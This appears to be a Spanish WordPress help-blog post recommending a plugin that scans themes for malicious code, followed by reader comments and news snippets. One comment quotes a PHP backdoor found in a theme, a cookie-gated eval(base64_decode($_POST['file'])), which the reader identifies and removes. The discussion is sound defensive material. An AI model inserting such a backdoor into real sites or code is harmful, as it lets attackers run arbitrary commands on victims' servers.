Hoy en día no es imposible hackear un theme WordPress, si no cumples unas mínimas reglas de seguridad alguien podría insertar código en tu theme, pero no solo así, es mucho mas fácil. Porque llevado por las búsquedas puedes llegar a descargar un theme de un sitio dudoso, en vez del sitio oficial, y activarlo en tu blog sin saber que lleva incluido código malicioso.
Si tienes dudas, o quieres asegurarte, puedes comprobarlo con el plugin Theme Authenticity Checker (o TAC). Lo que hace es buscar en los archivos de tu theme instalado y tratar de detectar código malicioso. Si encuentra código de este tipo muestra la ruta al fichero del theme, el número de línea donde está y una pequeña muestra del código sospechoso.
Ahora bien ¿es seguro que ese código sea código malicioso?. Hay posibilidades de que no sea así. No es que sean muchos pero si hay algunos creadores de themes que incluyen códigos ocultos en Base64 o similares para, por ejemplo, impedir que retires los créditos al autor o sus patricinadores.
Entonces ¿como sé si el código es malware o no?. Lo mas fácil es contactar con el autor para comprobarlo, o si quieres descargar la versión “oficial” y comparar las posibles diferencias.
En cualquier caso, Theme Authenticity Checker te da pistas acerca de códigos que no deberían estar ahí, que no son normales en un theme para WordPress.
7 comentarios en “¿Han hackeado tu Theme?”
Información Bitacoras.com…
Si lo deseas, puedes hacer click para valorar este post en Bitacoras.com. Gracias….
Exelente Fernando, así nos podemos asegurar de que estamos usando un theme bueno, por así decirlo, sin ningún tipo de modificaciones raras.
Muchas gracias por el plugin.
Nos vemos
Me fascino esta herramienta… Por que desde ella tambien modifico los creditos y unos cuantos enlaces publicitarios… Gracias por haber posteado este plugin tan excelente…. Chao Ayudawordpress.com
Pues en mi teme había un código muy sospechoso:
if($_COOKIE['daccaf48560b651c']==”931f9058bd933379″){ eval(base64_decode($_POST['file'])); exit; }
Que sería algo como si la cookie es igual 931f9058bd933379 puedes recibir por post la variable file, lo descodificas de la base 64 y lo ejecutas.
Ya lo he borrado porque creo que con esto puedes enviar un fichero y ejecutar las ordenes en php….
Ya investigaré si ese código estaba ahí desde un principio.
Excelente plugin!.
Siempre que veo que algún theme contiene código ofuscado en el footer.php, lo que siempre hago es cambiar de theme o pedir ayuda para que me lo ofusquen.
Saludos!
Excelente recomendación. Hace algunos días tuve un problema de estos (por estar usando una versión vieja de Wordpress) y realmente fue un problema ya que Google consideró mi sitio como presunto de ataques.
[...] | Theme Authenticity Checker Vía | Ayuda WordPress noticias de blogs [...]
Escribe un Comentario
Comentarios adicionales gracias BackType
BuddyPress 1.2 está prácticamente lista para lanzarse salvo que las pruebas de los usuarios digan lo contrario. Ya puedes descargarla y empezar a comprobarla (enlace al svn). En esta nueva versión se han cerrado más de 125 tickets desde la última beta.
[#3]
Ya está disponible WordPress MU 2.9.1 y José Conti me avisa que en unas horas tendrá lista la traducción para poder tener actualizado y listo tu sitio multiusuario.
[#6]
¿Sabías que Kubrick, el tema que va a ser sustituido en 2010 lo creó un desarrollador danés?. Toda la historia de este tema, ya mítico, la tienes en este artículo (traducido con Google).
[#26]
Último mensaje de: Javier
En el foro: Plugins
Último mensaje de: francescorusso
En el foro: SEO - SEM
Último mensaje de: Em4-R
En el foro: Themes y Diseño
Último mensaje de: seijas
En el foro: Otros CMS
Último mensaje de: adriancon
En el foro: Plugins
Acceder